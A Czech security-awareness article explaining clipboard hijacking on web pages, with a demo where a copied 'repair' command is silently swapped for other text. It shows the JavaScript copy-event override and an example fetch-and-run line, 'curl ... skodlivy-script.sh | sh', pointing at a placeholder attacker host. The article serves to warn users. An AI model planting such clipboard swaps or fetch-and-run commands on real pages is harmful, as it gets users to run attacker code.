Programátoři, systémoví administrátoři, bezpečnostní výzkumníci a techničtí nadšenci, kteří kopírují příkazy z webových stránek přímo do konzole či terminálu velmi riskují ohrožení svého systému.
Předvedeme vám jednoduchý trik, který vás jak doufáme přiměje dvakrát si rozmyslet, než zkopírujete a vložíte text z webových stránek.
Webová stránka může skrytě nahradit kopírovaný obsah za úplně odlišný text, který skutečně skončí ve vaší schránce.
Takto lze nahradit naprosto neškodný, či užitečný příkaz například škodlivým scriptem a automaticky jej spustit.
Nevěříte? Pojďme si to vyzkoušet.
Jak opravit poškozený systém Linux?
Zkopírujte si tento krásně vypadající příkaz sloužící evidentně k opravě poškozeného operačního systému Linux. Klasicky označte text a pomocí kláves CTRL+C jej zkopírujte.
sudo apt repare-linux
Nyní prostě jen vložte tento zkopírovaný příkaz do textového souboru. Klasicky CTRL+V
Text který vaše schránka ve skutečnosti obsahuje je následující:
Prave jste se stali obeti jednoducheho utoku.Misto tohoto textu se muze nachazet napriklad nejaky script.
V případě skutečného útoku můžete ve schránce najít nejčastěji příkaz podobný tomuto:
curl https://utocnikova-adresa/skodlivy-script.sh | sh\n
Co se skutečně skrývá pod tímto odkazem?
<p id='copy'><code>sudo apt repare-buntu</code></p>
<script>
document.getElementById('copy').addEventListener('copy', function(e) {e.clipboardData.setData('text/plain', 'echo Prave jste se stali obeti jednoducheho utoku.\nMisto tohoto textu se muze nachazet napriklad nejaky script\n'); e.preventDefault();
});
</script>To je důvod, proč byste NIKDY neměli zkopírované příkazy přímo vkládat do terminálu.
Nikdy nevíte co skutečně kopírujete.
Tento útok je velmi jednoduchý, ale také velmi škodlivý.